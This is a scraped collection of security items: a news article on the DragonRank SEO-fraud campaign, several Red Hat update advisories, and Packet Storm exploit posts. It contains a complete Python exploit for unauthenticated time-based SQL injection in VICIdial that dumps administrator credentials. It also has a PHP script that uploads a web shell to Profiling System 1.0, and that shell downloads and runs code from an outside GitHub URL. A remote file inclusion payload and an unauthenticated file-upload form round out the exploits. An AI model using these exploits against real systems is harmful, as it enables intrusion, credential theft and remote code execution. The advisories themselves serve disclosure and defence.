A "simplified Chinese-speaking actor" has been linked to a new campaign that has targeted multiple countries in Asia and Europe with the end goal of performing search engine optimization (SEO) rank manipulation.
The black hat SEO cluster has been codenamed DragonRank by Cisco Talos, with victimology footprint scattered across Thailand, India, Korea, Belgium, the Netherlands, and China.
"

A "simplified Chinese-speaking actor" has been linked to a new campaign that has targeted multiple countries in Asia and Europe with the end goal of performing search engine optimization (SEO) rank manipulation.

The black hat SEO cluster has been codenamed **DragonRank** by Cisco Talos, with victimology footprint scattered across Thailand, India, Korea, Belgium, the Netherlands, and China.

"DragonRank exploits targets' web application services to deploy a web shell and utilizes it to collect system information and launch malware such as PlugX and BadIIS, running various credential-harvesting utilities," security researcher Joey Chen said.

The attacks have led to compromises of 35 Internet Information Services (IIS) servers with the end goal of deploying the BadIIS malware, which was first documented by ESET in August 2021.

It's specifically designed to facilitate proxy ware and SEO fraud by turning the compromised IIS server into a relay point for malicious communications between its customers (i.e., other threat actors) and their victims.

On top of that, it can modify the content served to search engines to manipulate search engine algorithms and boost the ranking of other websites of interest to the attackers.

"One of the most surprising aspects of the investigation is how versatile IIS malware is, and the \[detection of\] SEO fraud criminal scheme, where malware is misused to manipulate search engine algorithms and help boost the reputation of third-party websites," security researcher Zuzana Hromcova told The Hacker News at the time.

The latest set of attacks highlighted by Talos spans a broad spectrum of industry verticals, including jewelry, media, research services, healthcare, video and television production, manufacturing, transportation, religious and spiritual organizations, IT services, international affairs, agriculture, sports, and feng shui.

The attack chains commence with taking advantage of known security flaws in web applications like phpMyAdmin and WordPress to drop the open-source ASPXspy web shell, which then acts as a conduit to introduce supplemental tools into the targets' environment.

The primary objective of the campaign is to compromise the IIS servers hosting corporate websites, abusing them to implant the BadIIS malware and effectively repurposing them as a launchpad for scam operations by utilizing keywords related to porn and sex.

Another significant aspect of the malware is its ability to masquerade as the Google search engine crawler in its User-Agent string when it relays the connection to the command-and-control (C2) server, thereby allowing it to bypass some website security measures.

"The threat actor engages in SEO manipulation by altering or exploiting search engine algorithms to improve a website's ranking in search results," Chen explained. "They conduct these attacks to drive traffic to malicious sites, increase the visibility of fraudulent content, or disrupt competitors by artificially inflating or deflating rankings."

One important way DragonRank distinguishes itself from other black hat SEO cybercrime groups is in the manner it attempts to breach additional servers within the target's network and maintain control over them using PlugX, a backdoor widely shared by Chinese threat actors, and various credential-harvesting programs such as Mimikatz, PrintNotifyPotato, BadPotato, and GodPotato.

Although the PlugX malware used in the attacks relies on DLL side-loading techniques, the loader DLL responsible for launching the encrypted payload uses the Windows Structured Exception Handling (SEH) mechanism in an attempt to ensure that the legitimate file (i.e., the binary susceptible to DLL side-loading) can load the PlugX without tripping any alarms.

Evidence unearthed by Talos points to the threat actor maintaining a presence on Telegram under the handle "tttseo" and the QQ instant message application to facilitate illegal business transactions with paying clients.

"These adversaries also offer seemingly quality customer service, tailoring promotional plans to best fit their clients' needs," Chen added.

"Customers can submit the keywords and websites they wish to promote, and DragonRank develops a strategy suited to these specifications. The group also specializes in targeting promotions to specific countries and languages, ensuring a customized and comprehensive approach to online marketing."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

DragonRank Black Hat SEO Campaign Targeting IIS Servers Across Asia and Europe

An attacker with authenticated access to VICIdial version 2.14-917a as an agent can execute arbitrary shell commands as the root user. This attack can be chained with CVE-2024-8503 to execute arbitrary shell commands starting from an unauthenticated perspective.

VICIdial 2.14-917a Remote Code Execution

An unauthenticated attacker can leverage a time-based SQL injection vulnerability in VICIdial version 2.14-917a to enumerate database records. By default, VICIdial stores plaintext credentials within the database.

    KL-001-2024-011: VICIdial Unauthenticated SQL InjectionTitle: VICIdial Unauthenticated SQL InjectionAdvisory ID: KL-001-2024-011Publication Date: 2024-09-10Publication URL: https://korelogic.com/Resources/Advisories/KL-001-2024-011.txt1. Vulnerability Details      Affected Vendor: VICIdial      Affected Product: VICIdial      Affected Version: 2.14-917a      Platform: GNU/Linux      CWE Classification: CWE-89: Improper Neutralization of Special                          Elements used in an SQL Command                          ('SQL Injection')      CVE ID: CVE-2024-85032. Vulnerability Description      An unauthenticated attacker can leverage a time-based SQL      injection vulnerability in VICIdial to enumerate database      records. By default, VICIdial stores plaintext credentials      within the database.3. Technical Description      VICIdial is an open-source contact center suite, mainly used      by call centers. The "vicidial.com" website boasts over 14,000      registered installations. There is a public SVN repository to      access the source code, as well as an ISO that can be used to      install the software. The ISO was used in a virtual machine      for testing purposes.      When performing SQL queries, VICIdial does not use prepared      statements, but instead uses the "preg_replace" PHP function      to remove problematic characters in user-controlled input      before interpolating the variable into a SQL query. This      is largely an effective solution, as regular expressions      like "/[^-_0-9a-zA-Z]/" are passed to "preg_replace", which      essentially limits input to the characters shown in the pattern      (letters, numbers, underscores, and hyphens).      However, these scripts do not utilize a shared PHP file      for performing sanitization uniformly. Instead, each script      individually implements the "preg_replace" function, leading      to inconsistencies in which patterns are used and where they      are applied.      For example, providing credentials via the "Authorization"      request header using the "Basic" scheme, most PHP scripts      sanitize the username value with the following line:     $PHP_AUTH_USER = preg_replace('/[^-_0-9a-zA-Z]/','',$PHP_AUTH_USER);      However, the "VERM_AJAX_functions.php" PHP script does not      perform any sanitization before inserting the username into      a SQL "INSERT" statement:     $PHP_AUTH_USER=$_SERVER['PHP_AUTH_USER'];     $PHP_AUTH_PW=$_SERVER['PHP_AUTH_PW'];     ...     if ($function=="log_custom_report")       {       $rpt_log_stmt="insert ignore into         verm_custom_report_holder(user,         report_name, report_parameters)         values('$PHP_AUTH_USER', '$custom_report_name',         '$LOGhttp_referer') ON DUPLICATE KEY         UPDATE report_name='$custom_report_name',         report_parameters='$custom_report_vars'";       $rpt_log_rslt=mysql_to_mysqli($rpt_log_stmt, $link);       return mysqli_affected_rows($rpt_log_rslt);       }      Since "VERM_AJAX_functions.php" can be accessed without      authentication, this creates a straight forward unauthenticated      SQL injection vulnerability. While the page response cannot      be manipulated by the execution of the query, delays in the      page response can be observed when using SQL functions such as      "sleep()", enabling the enumeration of database values using      time-based SQL injection:     $ time curl -u "foo:bar" \  http://REDACTED/VERM/VERM_AJAX_functions.php?function=log_custom_report     real    0m0.019s   <--- (normal response time)     user    0m0.004s     sys    0m0.008s     $ time curl -u "','',sleep(5));#:bar" \  http://REDACTED/VERM/VERM_AJAX_functions.php?function=log_custom_report     real    0m5.023s   <--- (5-second delay in response time)     user    0m0.003s     sys    0m0.008s      This observable difference can be used to craft queries that      sleep under specific conditions, allowing an attacker to ask      "Yes or No" questions. In the following example, the "sleep()"      function is called only if the provided string matches the      database version:     $ time curl -u \         "','',IF(@@version='korelogic',sleep(5),NULL));#:bar" \  http://vicidial.zz/VERM/VERM_AJAX_functions.php?function=log_custom_report     real    0m0.024s   <--- (normal response time)     user    0m0.006s     sys    0m0.003s     $ time curl -u \  "','',IF(@@version='10.6.14-MariaDB-log',sleep(5),NULL));#:bar" \  http://vicidial.zz/VERM/VERM_AJAX_functions.php?function=log_custom_report     real    0m5.019s   <--- (5-second delay in response time)     user    0m0.004s     sys    0m0.008s4. Mitigation and Remediation Recommendation      This issue has been remediated in the public svn/trunk codebase,      as of revision 3848 committed 2024-07-08.5. Credit      This vulnerability was discovered by Jaggar Henry of KoreLogic,      Inc.6. Disclosure Timeline      2024-07-05 : KoreLogic requests security contact from                   support@vicidial.com.      2024-07-08 : KoreLogic reports vulnerability details to VICIdial                   contact.      2024-07-08 : VICIdial notifies KoreLogic that the issue has been                   remediated with revision 3848 in the public                   Subversion repository.      2024-07-11 : KoreLogic confirms this vulnerability has been                   remediated. KoreLogic asks VICIdial if it is                   appropriate to publicly disclose the vulnerability                   details at this time.      2024-07-11 : VICIdial requests four weeks of embargo in order to                   upgrade supported customers.      2024-08-05 : KoreLogic asks VICIdial if it is appropriate to                   publicly disclose the vulnerability details at                   this time.      2024-08-09 : VICIdial requests an additional two weeks of                   embargo.      2024-09-10 : KoreLogic public disclosure.7. Proof of Concept      The following script can be used to automate the exploitation process and      enumerate the results of provided queries:          $ time python unauth_sqli.py -rh vicidial.zz -rp 443 -q 'SELECT @@version'          [+] Target appears vulnerable to time-based SQL injection          [~] Executing SQL: SELECT @@version          [~] 1          [~] 10          [~] 10.          [~] 10.6          [~] 10.6.          [~] 10.6.1          [~] 10.6.14          [~] 10.6.14-          [~] 10.6.14-M          [~] 10.6.14-Ma          [~] 10.6.14-Mar          [~] 10.6.14-Mari          [~] 10.6.14-Maria          [~] 10.6.14-MariaD          [~] 10.6.14-MariaDB          [~] 10.6.14-MariaDB-          [~] 10.6.14-MariaDB-l          [~] 10.6.14-MariaDB-lo          [~] 10.6.14-MariaDB-log          real    0m6.727s          user    0m0.425s          sys    0m0.020s      ##############################      ##      unauth_sqli.py      ##      ##############################      import string      import random      import urllib3      import argparse      import requests      from base64 import b64encodeurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)      class Exploit:          def __init__(self, rhost, rport, proxy=None):              """              This 'sleep' duration is derived by the average response time              multiplied by this value. A server with an average response time              of 10ms is given a 'sleep' duration of 300ms. Tune as needed.              """              self.SLEEP_MULTIPLIER = 30              self.REQUEST_HEADERS = {'User-Agent': 'KoreLogic'}              self.ALLOWED_SCHEMES = ['http', 'https']              if proxy:                  self.REQUEST_PROXIES = {                      'http':  proxy,                      'https': proxy                  }              else:                  self.REQUEST_PROXIES = {}              self.TARGET_IP   = rhost              self.TARGET_PORT = rport              self.VICIDIAL_FINGERPRINT = 'Please Hold while I redirect you!'              self.RANDOM_CHARSET = string.ascii_uppercase + string.digits          # returns a URI with 'http' or 'https'          def determine_target_uri(self):              for scheme in self.ALLOWED_SCHEMES:                  target_uri = f'{scheme}://{self.TARGET_IP}:{self.TARGET_PORT}'                  try:                      response = requests.get(target_uri, headers=self.REQUEST_HEADERS, verify=False)                      if self.VICIDIAL_FINGERPRINT in response.text:                          return target_uri                  except:                      pass          # returns a session object with custom proxies/headers if supplied          def build_requests_session(self):              self.base_uri = self.determine_target_uri()              session = requests.Session()              session.proxies = self.REQUEST_PROXIES              session.verify  = False              return session          # returns a random string of a given length          def random(self, length):              return ''.join(random.choice(self.RANDOM_CHARSET) for _ in range(length))          # returns a timedelta representing the response time of an injected SQL query          def time_sql_query(self, query, session):              username    = f"goolicker', '', ({query}));# "              credentials = f'{username}:password'              credentials_base64 = b64encode(credentials.encode()).decode()              auth_header = f'Basic {credentials_base64}'              target_uri = f'{self.base_uri}/VERM/VERM_AJAX_functions.php'              request_params  = {'function': 'log_custom_report', self.random(5): self.random(5)}              request_headers = {**self.REQUEST_HEADERS, 'Authorization': auth_header}              response = session.get(target_uri, params=request_params, headers=request_headers)              return response.elapsed          # returns a boolean if time-based SQL injection is possible, additionally          # sets the best 'sleep' duration based on response times          def is_vulnerable(self, session, baseline_iterations=5):              # determine average baseline response time              zero_sleep_query = f'SELECT (NULL)'              total_baseline_time = 0              for _ in range(baseline_iterations):                  execution_time = self.time_sql_query(zero_sleep_query, session)                  total_baseline_time += execution_time.total_seconds()              average_baseline_response_time = total_baseline_time / baseline_iterations              self.sql_baseline_time = average_baseline_response_time              # determine if injected sleep query impacts response time              sleep_length = round(average_baseline_response_time * self.SLEEP_MULTIPLIER, 2)              sleep_query  = f'SELECT (sleep({sleep_length}))'              execution_time = self.time_sql_query(sleep_query, session)              if execution_time.total_seconds() >= sleep_length:                  self.sql_sleep_length = sleep_length                  return True              else:                  return False          # determine if a character at a specific indice of a query result returns a          # boolean 'true' when compared to a given character using the supplied operator          def check_indice_of_query_result(self, session, query, indice, operator, ordinal):              parent_query    = f'SELECT IF(ORD((SUBSTRING(({query}), {indice}, {indice}))){operator}{ordinal}, sleep({self.sql_sleep_length}), null)'              execution_time  = self.time_sql_query(parent_query, session)              return execution_time.total_seconds() >= (self.sql_baseline_time * self.SLEEP_MULTIPLIER)          def enumerate_sql_query(self, session, query='SELECT @@version', charset=string.printable):              # convert charset to ordinals              all_characters     = sorted([ord(char) for char in charset])              reduced_characters = all_characters              # use a binary search and enumerate query results              result = ''              indice = 1              indice_could_be_null = True              while True:                  """                  we check if the value is NULL once per indice                  to determine when a string ends. this adds one                  request per indice, but since every boolean 'true'                  results in a delay this is faster than counting                  the length of the string before enumrating.                  """                  if indice_could_be_null:                      if self.check_indice_of_query_result(session, query, indice, '=', '0'):                          break                      else:                          indice_could_be_null = False                  # enumerate each character of query result with a binary search                  middle_indice  = len(reduced_characters) // 2                  middle_ordinal = reduced_characters[middle_indice]                  if self.check_indice_of_query_result(session, query, indice, '<=', middle_ordinal):                      if self.check_indice_of_query_result(session, query, indice, '=', middle_ordinal):                          reduced_characters = all_characters                          result += chr(middle_ordinal)                          indice += 1                          indice_could_be_null = True                          print(f'[~] {result}')                      else:                          reduced_characters = reduced_characters[:middle_indice]                  else:                      reduced_characters = reduced_characters[middle_indice:]              return result          # returns administrator username and password by          # exploiting time-based SQL injection.          def extract_admin_credentials(self, session):              print('[~] Enumerating administrator credentials')              username_charset = string.ascii_letters + string.digits              admin_username_query = "SELECT user FROM vicidial_users WHERE user_level = 9 AND modify_same_user_level = '1' LIMIT 1"              admin_username = self.enumerate_sql_query(session, admin_username_query, username_charset)              print(f'[+] Username: {admin_username}')              password_charset = string.ascii_letters + string.digits + '-.+/=_'              admin_password_query = f"SELECT pass FROM vicidial_users WHERE user = '{admin_username}' LIMIT 1"              admin_password = self.enumerate_sql_query(session, admin_password_query, password_charset)              print(f'[+] Password: {admin_password}')              return admin_username, admin_password          # injects SQL queries and enumerates results if instance is vulnerable          def exploit(self, custom_query=None):              session = self.build_requests_session()              is_vulnerable = self.is_vulnerable(session)              if is_vulnerable:                  print('[+] Target appears vulnerable to time-based SQL injection')              else:                  print('[-] Failed to perform time-based SQL injection')                  return              if custom_query:                  print(f'[~] Executing SQL: {custom_query}')                  self.enumerate_sql_query(session, custom_query)              else:                  self.extract_admin_credentials(session)      if __name__ == '__main__':          argparser = argparse.ArgumentParser(description='Exploit for CVE-2024-XXXXX: Unauthenticated SQLi')          required  = argparser.add_argument_group('Required Arguments')          optional  = argparser.add_argument_group('Optional Arguments')          required.add_argument('-rh', '--rhost', required=True, help='Vicidial Server IP address')          required.add_argument('-rp', '--rport', required=True, help='Vicidial Server port number')          optional.add_argument('-q',  '--query', required=False, help='Custom SQL query to execute',                default=None)          optional.add_argument('-p',  '--proxy', required=False, help='HTTP[S] proxy to use for outbound requests', default=None)          arguments = argparser.parse_args()          exploit = Exploit(              rhost = arguments.rhost,              rport = arguments.rport,              proxy = arguments.proxy          )          exploit.exploit(custom_query=arguments.query)The contents of this advisory are copyright(c) 2024KoreLogic, Inc. and are licensed under a Creative CommonsAttribution Share-Alike 4.0 (United States) License:http://creativecommons.org/licenses/by-sa/4.0/KoreLogic, Inc. is a founder-owned and operated company with aproven track record of providing security services to entitiesranging from Fortune 500 to small and mid-sized companies. Weare a highly skilled team of senior security consultants doingby-hand security assessments for the most important networks inthe U.S. and around the world. We are also developers of varioustools and resources aimed at helping the security community.https://www.korelogic.com/about-korelogic.htmlOur public vulnerability disclosure policy is available at:https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy

VICIdial 2.14-917a SQL Injection

Red Hat Security Advisory 2024-6576-03 - An update for the redhat-ds:11 module is now available for Red Hat Directory Server 11.7 for RHEL 8. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6576.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: redhat-ds:11 security and bug fix update  
Advisory ID:        RHSA-2024:6576-03  
Product:            Red Hat Directory Server  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6576  
Issue date:         2024-09-11  
Revision:           03  
CVE Names:          CVE-2024-3657  
====================================================================

Summary: 

An update for the redhat-ds:11 module is now available for Red Hat Directory Server 11.7 for RHEL 8.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat Directory Server is an LDAPv3-compliant directory server. The suite of packages includes the Lightweight Directory Access Protocol (LDAP) server, as well as command-line utilities and Web UI packages for server administration.

Security Fixes:

* 389-ds-base: Malformed userPassword hash may cause Denial of Service (CVE-2024-5953)

* 389-ds-base: Specially crafted kerberos AS-REQ request may cause Denial of Service (CVE-2024-3657)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Bug Fix(es):

* Improved performance of filter component when evaluating a large value  
set, such as group members  (DIRSRV-153)

* The new connection timeout error no longer breaks error mapping (DIRSRV-154)

Users of Red Hat Directory Server 11 are advised to install these updated packages.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-3657

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2274401  
https://bugzilla.redhat.com/show_bug.cgi?id=2292104

Red Hat Security Advisory 2024-6576-03

Red Hat Security Advisory 2024-6568-03 - An update for the redhat-ds:11 module is now available for Red Hat Directory Server 11.9 for RHEL 8.10. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6568.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: redhat-ds:11 security and bug fix updateAdvisory ID:        RHSA-2024:6568-03Product:            Red Hat Directory ServerAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6568Issue date:         2024-09-11Revision:           03CVE Names:          CVE-2024-5953====================================================================Summary: An update for the redhat-ds:11 module is now available for Red Hat Directory Server 11.9 for RHEL 8.10.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat Directory Server is an LDAPv3-compliant directory server. The suite of packages includes the Lightweight Directory Access Protocol (LDAP) server, as well as command-line utilities and Web UI packages for server administration.Security Fixes:* 389-ds-base: Malformed userPassword hash may cause Denial of Service (CVE-2024-5953) (DIRSRV-151)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Bug Fix(es):* Improved performance of filter component when evaluating a large value set, such as group members (DIRSRV-149)* The new connection timeout error no longer breaks error mapping (DIRSRV-150)Users of Red Hat Directory Server 11 are advised to install these updated packages.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-5953References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2292104

Red Hat Security Advisory 2024-6568-03

Red Hat Security Advisory 2024-6536-03 - Red Hat AMQ Streams 2.5.2 is now available from the Red Hat Customer Portal. Issues addressed include bypass, denial of service, information leakage, and memory leak vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6536.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: Red Hat AMQ Streams 2.5.2 release and security update  
Advisory ID:        RHSA-2024:6536-03  
Product:            Streams for Apache Kafka  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6536  
Issue date:         2024-09-10  
Revision:           03  
CVE Names:            
====================================================================

Summary: 

Red Hat AMQ Streams 2.5.2 is now available from the Red Hat Customer Portal.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat AMQ Streams, based on the Apache Kafka project, offers a distributed backbone that allows microservices and other applications to share data with extremely high throughput and extremely low latency. 

This release of Red Hat AMQ Streams 2.5.2 serves as a replacement for Red Hat AMQ Streams 2.5.1, and includes security and bug fixes, and enhancements.

Security Fix(es):  
* Scala: sbt is a build tool for Scala, Java, and others. Given a specially crafted zip or JAR file, `IO.unzip` allows writing of arbitrary file. This would have potential to overwrite `/root/.ssh/authorized_keys`. Within sbt's main code, `IO.unzip` is used in `pullRemoteCache` task and `Resolvers.remote`; however many projects use `IO.unzip(...)` directly to implement custom tasks. This vulnerability has been patched in version 1.9.7.(CVE-2023-46122)

* ZooKeeper: Information disclosure in persistent watcher handling. Users are recommended to upgrade to version 3.9.2, 3.8.4 which fixes the issue.  
(CVE-2024-23944)

* ZooKeeper: Authorization Bypass in Apache ZooKeeper [amq-st-2](CVE-2023-44981)

* Snappy: flaw was found in SnappyInputStream in snappy-java. This issue occurs when decompressing data with a too-large chunk size due to a missing upper bound check on chunk length. An unrecoverable fatal error can occur, resulting in a Denial of Service (DoS) (CVE-2023-43642)

* Kafka: snappy-java: Unchecked chunk length leads to DoS [amq-st-2](CVE-2023-34455), (CVE-2024-27309), (CVE-2024-31141)

* Strimzi Operators: vertx-core: io.vertx:vertx-core: memory leak when a TCP server is configured with TLS and SNI support (CVE-2024-1300)

* Strimzi Bridge: flaw was found in SnappyInputStream in snappy-java (CVE-2023-43642)

* Strimzi Bridge: netty-codec-http: Allocation of Resources Without Limits or Throttling (CVE-2024-29025)

* Strimzi Bridge: vertx-core: io.vertx:vertx-core: memory leak when a TCP server is configured with TLS and SNI support (CVE-2024-1300)

* Strimzi Bridge: netty-codec-http2: HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (CVE-2023-44487)

 * Strimzi Bridge: Bump snappy-java to fix (CVE-2023-43642)

* Strimzi OAuth: In Connect2id Nimbus JOSE+JWT before 9.37.2, an attacker can cause a denial of service (resource consumption) via a large JWE p2c header value (aka iteration count) for the PasswordBasedDecrypter (PBKDF2) component. (CVE-2023-52428)

* Cruise Control: flaw was found in SnappyInputStream in snappy-java (CVE-2023-43642)

* Cruise Control: jose4j- denial of service via specially crafted JWE (CVE-2023-51775)

 * Cruise Control: Bump snappy-java to fix (CVE-2023-43642)

* Cruise Control: cruise-control reported a high-sev json vulnerability (CVE-2023-5072)

* Cruise Control: Nimbus JOSE+JWT before 9.37.2 (CVE-2023-52428)

* Strimzi Kafka Kubernetes Config Provider: Bump snappy-java to fix (CVE-2023-43642)

Solution:

CVEs:

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://issues.redhat.com/browse/ENTMQST-5366  
https://issues.redhat.com/browse/ENTMQST-5882  
https://issues.redhat.com/browse/ENTMQST-5885  
https://issues.redhat.com/browse/ENTMQST-5886  
https://issues.redhat.com/browse/ENTMQST-6235

Red Hat Security Advisory 2024-6536-03

Profiling System version 1.0 suffers from a remote shell upload vulnerability.

    =============================================================================================================================================| # Title     : Profiling System 1.0 code injection Vulnerability                                                                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/11222/profiling-system-human-resource-management.html                                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload injects php code of your choice into an SHELL.php file. [+] Line 26    Line 35  [+] change the path of the script folder.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php 127.0.0.1[+] payload : <?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(        'upload' => '',        'per_file' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),        'per_name' => 'inouva',        'file_name' => '123',        'qty' => '1'    );    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "http://$target_ip/ProfilingSystem/add_file_query.php");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: http://$target_ip/ProfilingSystem/uploads/$file_name\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Profiling System 1.0 Shell Upload

Online Survey System version 1.0 suffers from cross site scripting and remote file inclusion vulnerabilities.

**Online Survey System 1.0 Cross Site Scripting / Remote File Inclusion**

**Online Survey System 1.0 Cross Site Scripting / Remote File Inclusion**

Posted Sep 11, 2024

Authored by indoushka

Online Survey System version 1.0 suffers from cross site scripting and remote file inclusion vulnerabilities.

tags | exploit, remote, vulnerability, xss, file inclusion

SHA-256 | 0573d4aa4fad74ba21dfae8c95d8a0ef8922ce6bbbf5c65fcd1a8b98424e3d9e

Download | Favorite | View

**Online Survey System 1.0 Cross Site Scripting / Remote File Inclusion**

    =============================================================================================================================================| # Title     : Online Survey System 1.0 XSS Vulnerability                                                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/simple-online-survey-system_0.zip                     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /index.php?page=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpg[+] http://127.0.0.1/survey/index.php?page=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpgGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Online Survey System 1.0 Cross Site Scripting / Remote File Inclusion

Printable Staff ID Card Creator System version 1.0 suffers from an insecure direct object reference vulnerability.

=============================================================================================================================================  
| # Title     : printable staff id card creator system 1.0 idor Vulnerability                                                               |  
| # Author    : indoushka                                                                                                                   |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            |  
| # Vendor    : https://www.campcodes.com/downloads/printable-staff-id-card-creator-system-source-code/?wpdmdl=6749&refresh=66bbc00367bf91723580419               |  
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] Insecure direct object reference: Suffering from an insecure direct object reference that allows users to upload and execute remote files. .

[+] Line : 8 Set your Target

[+] Save As poc.html

[+] payload :

<<div class="modal-content" style="font-size: 14px; font-family: Times New Roman;color:black;">  
      <div class="modal-header" style="background:#222d32">  
        <button type="button" class="close" data-dismiss="modal">×</button>  
        <h4 class="modal-title" style="font-weight: bold;color: #F0F0F0"><center>  
          SYSTEM INFORMATION INITIALISATION  
          </center></h4>  
      </div>  
        <form method="post" action="http://127.0.0.1/Staff_registration/upload.php" enctype="multipart/form-data">            

      <div class="modal-body">           
        <center>   
            <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp;&nbsp;Org Name:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgname"></span></p>  
              <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;Phone:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgphone"></span></p>  
            <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp; &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;Email:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgemail"></span></p>  
               <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">&nbsp; &nbsp;&nbsp;&nbsp;Website:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgwebsite"></span></p>  
               <p style="margin-bottom:10px;"><span style="font-size: 18px; font-weight: bold;">Active Year:<label style="color: red;font-size:20px;">*</label><input style="width:270px;" type="text" name="orgyear"></span></p>  
                  Attach Organisation Logo:(<h7 style="color:red">Make sure it is a transparent image</h7>)<input name="filed" type="file" id="filed">  
                                      <input type="hidden" name="page" value="admin.php">                                                                      
         </center>  
      </div>  
      <div class="modal-footer">  
        <input type="submit" class="btn btn-success" value="Finish" id="addmember" name="orginitial"> &nbsp;  
        <button type="button" class="btn btn-success" data-dismiss="modal">Close</button>  
      </div>  
      </form></div>

    Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================

Printable Staff ID Card Creator System 1.0 Insecure Direct Object Reference

A veritable grab bag of tools used to access critical infrastructure networks are wildly insecure, and they're blobbing together to create a widening attack surface.

Source: Agencja Fotograficzna Caro via Alamy Stock Photo

